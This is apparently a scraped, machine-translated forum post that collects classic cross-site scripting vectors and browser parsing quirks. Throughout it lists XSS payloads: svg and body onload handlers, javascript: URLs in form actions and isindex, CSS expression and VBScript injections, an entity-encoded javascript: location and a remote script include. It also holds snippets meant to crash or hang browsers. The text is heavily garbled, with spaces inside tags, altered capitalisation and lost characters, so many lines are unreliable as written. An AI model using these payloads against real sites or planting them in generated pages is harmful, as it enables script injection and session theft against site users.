Some classic XSS cross-site code sorting

Comments: Some classic XSS cross-site code sorting <! -- "--!> <Input value = ">
<Script/onload = alert (1)> </script> IE9
<Style/onload = alert (1)>
Alert ([0x0D] --> [0x0D] 1 <! -- [0x0D])
1 <! -- I
Document. write (' \ 0">'); IE8
JSON. parse ('{"_ proto _": ["a", 1]}')
Location ++
IE valid syntax: me, ah = 1, B = [me, ah], alert (Me, Ah)
Alert ('aaa \ 0bbb ') IE only show aaa http://jsbin.com/emekog
<Svg> <animation xLI: href = "javascript: alert (1)"> based on H5SC #88 # Opera
Function ('alert (arguments. callee. caller )')()
Firefox dos? While (1) find ();
<Div/style = x: expression (alert (URL = 1)>
Inject <meta http-equiv = "X-UA-Compatible" content = "IE = EmulateIE7"> enabled css expression, breaking standard mode!
<Applet code = javascript: alert ('sgl ')> and <embed src = javascript: alert ('sgl')> umm... cute FF!
<Math> <script> sgl = '' </script> chrome firefox opera vector
<Svg> <oooooo/oooooooooo/onload = alert (1)> works on webkit ~
<Body/onload =\\\ vbs \\\:::::::: alert + 'X' + [000000] + 'O' + 'X' + [000000] ::::::::>
Vbs: alert +-[]
<Body/onload = vbs: alert ---- + -- + ---- 1 :::::::::>
Firefox vector <math> <a xlink: href = "// mmme. me"> click
<Svg> <script> a = '<svg/onload = alert (1)> </svg>'; alert (2) </script>
Inj> <script/src = // 0.gg/ xxxxx> <script>... </script> less xss
[Code] Webkit X-XSS-Protection header is enabled just now: P
<Svg/onload = domain = id> 22 letters e. g http://fiddle.jshell.net./KG7fR/5/show/
<? Xml encoding = "> <svg/onload = alert (1) //>">
<A " x </a> Distinctive IE
Also <a' = " '> <H1 "= ''> <1 h name = "<svg/onload = alert (1)>"> </1 h>
works in not-IE
Javascript = 1; for (javascript in RuntimeObject (); javascript = 'javascript'
<Body/onerror = alert (event)> Firefox Sanbox object
works in firefox
For (x in document. open); Crash your IE 6:>
LocalStorage. setItem ('secret', 1)
Only to find '? '. ToUpperCase () = '? '. ToUpperCase ()
J? H? T? W? Y? I? Length = 2
'? '. ToUpperCase () =' I'
Also '? '. ToUpperCase () = 'ss'
'?. ToUpperCase () = 'ff '// alike :? FI? FL? FFI? FFL? ST? ST
# Opera data: text/html; base64, <PH Nj cmlwdD5hb me-le-count-go to GVyd CgxKTwvc 2NyaXB0Pg >>>>>>>>>
Firefox always the most cute data: _, <script> alert (1) </script>
<A href = "ftp:/baidu.com"> xx </a>
Http ://?????????? Works in Firefox
RegExp. prototype. valueOf = alert,/-/; // IE, is there anything else?
Location = '& #106 & #97 & #118 & #97 & #115 & #99 & #114 & #105 & #112 & #116 & #58 & #97 & #108 & #101 & #114 & #116 & #40 & #49 & #41'
For ({} in {});
Simy deep dive http://jsbin.com/inekab for Opera only
<A href = https: http://www.google.com> x </a> That's a relative path?
Document. frames = window. frames
<A href = "jar: xxx" id = x> </a> x. protocol = 'HTTP: 'on # firefox
(0). constructor. constructor = function () {alert (eval (arguments [0]. substr (6)} Easy to decode jjencode and aaencode: D
127.0x000000001 = 127.0.0.1
<Input value = "& #31 sefewfewf"/> Chrome input value block
<Svg> <xmp>

Interesting isindex <isindex formaction = javascript: alert (1) type = submit>
Chrome: xx-> chrome: // crash/crash?
<Form action = javascript: alert (1)/> <input> Chrome input enter fucked!
<Form/> <button/> <keygen/> chrome send empty key, is funny ~ _~
<Form/> <input/formaction = javascript: alert (1)> Because <form> not a void element. [/code
[Code] <form> <input/name = "isindex"> when name are isindex does not send key.
<Form id = x> </form> <button form = x formaction = "javascript: alert (1)"> X It like http://html5sec.org/#1 but only chrome support.
<Script language = "php"> echo 1?> Fascinating.
Fvck: (_? In? This) _ ['match'] (/. Element $/) & console. log (_)
Location. reload ('javascript: alert (1) ') // ie only, lol ~
{} Alert (1)
Twitter @ jackmasa = P